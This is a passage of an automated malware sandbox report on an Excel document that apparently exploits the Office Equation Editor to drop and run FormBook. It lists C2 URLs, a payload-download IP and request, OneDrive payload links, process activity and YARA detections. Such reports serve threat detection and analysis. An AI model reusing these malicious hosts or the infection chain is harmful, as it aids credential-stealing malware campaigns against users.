              Source: 4.3.vbc.exe.33199c.253.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf3ffc.87.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cfd0a8.93.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce52c8.112.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1ce4370.25.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf0ed4.91.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 10.3.Odhbljup.exe.1cf1414.56.unpackAvira: Label: TR/Patched.Ren.Gen
              Source: 7.3.Odhbljup.exe.1d790f4.170.unpackAvira: Label: TR/Patched.Ren.Gen

              Exploits:

              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
              Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
              Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
              Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80
              Source: global traffic | DNS query: name: onedrive.live.com
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 4x nop then pop ebx

              Networking:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exe | Network Connect: 87.98.234.164 80
              Source: C:\Windows\explorer.exe | Domain query: www.urzeczenie.com
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractor | URLs: www.heidecide.xyz/hno0/
              Source: global traffic | HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1 | Host: www.urzeczenie.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
              Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 02 Dec 2021 18:33:47 GMT | Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25 | Last-Modified: Thu, 02 Dec 2021 09:01:28 GMT | ETag: "aa600-5d2260935ec6b" | Accept-Ranges: bytes | Content-Length: 697856 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
              Source: global traffic | HTTP traffic detected: GET /7009/binso.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 13.250.31.113 | Connection: Keep-Alive
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
              Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
              Source: vbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912K
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/h
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | String found in binary or memory: https://prigmg.am.files.1drv.com/
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp | String found in binary or memory: https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf
              Source: unknown | DNS traffic detected: queries for: onedrive.live.com
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 02 Dec 2021 18:35:28 GMT | Server: Apache/2 | Content-Length: 392 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>
              Source: unknown | TCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00433B64 GetKeyboardState,
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

              E-Banking Fraud:

              Yara detected FormBook
              Source: Yara match | File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E966E8
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E966F3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E96340
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E96743
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E96753
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02E9CF01
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_0044629C
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_0044B47C
              Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_0044629C
              Source: C:\Users\user\Odhbljup.exe | Code function: 7_2_0044B47C
              Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0044629C
              Source: C:\Users\user\Odhbljup.exe | Code function: 10_2_0044B47C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02071238
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FCE0C6
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0201A37B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FE905A
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_020763BF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD3040
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FFD005
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FF63DB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FCF3CF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0204D06D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD7353
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD2305
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FCE2E9
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205D13F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FEC5F0
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02072622
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0201A634
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD351F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FE1489
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205579A
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_020057C3
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205443E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FDC7BC
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0200D47D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02005485
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FDE6C1
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02016540
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD4680
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_020505E3
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FE69FE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FD29B2
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02083A83
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FF286D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FDC85C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0207CBA4
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02056BCB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205DBDA
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FCFBD7
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0204F8C4
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0206F8EE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FF7B00
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205394B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02055955
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0207098E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02002E2F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FDCD5B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205BF14
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0206CFB1
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02042FDC
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0205AC5E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FFDF7C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FE0F3F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_02000D3B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_01FEEE4C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0206FDDD
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0009D192
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0009B8C6
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0009C953
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00088C7B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00088C80
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0009BCA9
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00082D87
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00082D90
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_0009BDFF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00082FB0
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00396F06
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_003932FF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00393302
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00391362
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00391359
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_003957B2
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_003908FB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00390902
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 12_2_00397D02
              Source: binso[1].exe.2.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Odhbljup.exe.4.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exe | Section loaded: amsi.dll
              Source: C:\Users\Public\vbc.exe | Section loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exe | Section loaded: ieproxy.dll
              Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exe | Memory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exe | Memory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exe | Memory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exe | Memory allocated: 76E90000 page execute and read and write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76F90000 page execute and read and write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Memory allocated: 76E90000 page execute and read and write
              Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
